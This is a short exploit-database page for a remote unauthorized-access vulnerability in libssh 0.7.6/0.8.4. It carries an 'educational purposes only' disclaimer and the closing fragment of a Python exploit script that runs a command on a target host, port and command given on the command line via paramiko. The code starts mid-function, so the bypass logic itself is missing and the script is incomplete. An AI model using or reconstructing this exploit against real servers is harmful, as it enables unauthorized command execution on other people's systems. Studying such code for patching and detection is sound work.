Exploits / Vulnerability Discovered : 2018-10-20 |
Type : remote |
Platform : linux
This exploit / vulnerability Libssh 0.7.6 / 0.8.4 unauthorized access is for educational purposes only and if it is used you will do on your own risk!
return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
except socket.error:
logging.debug("Unable to connect.")
return None
if __name__ == '__main__':
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))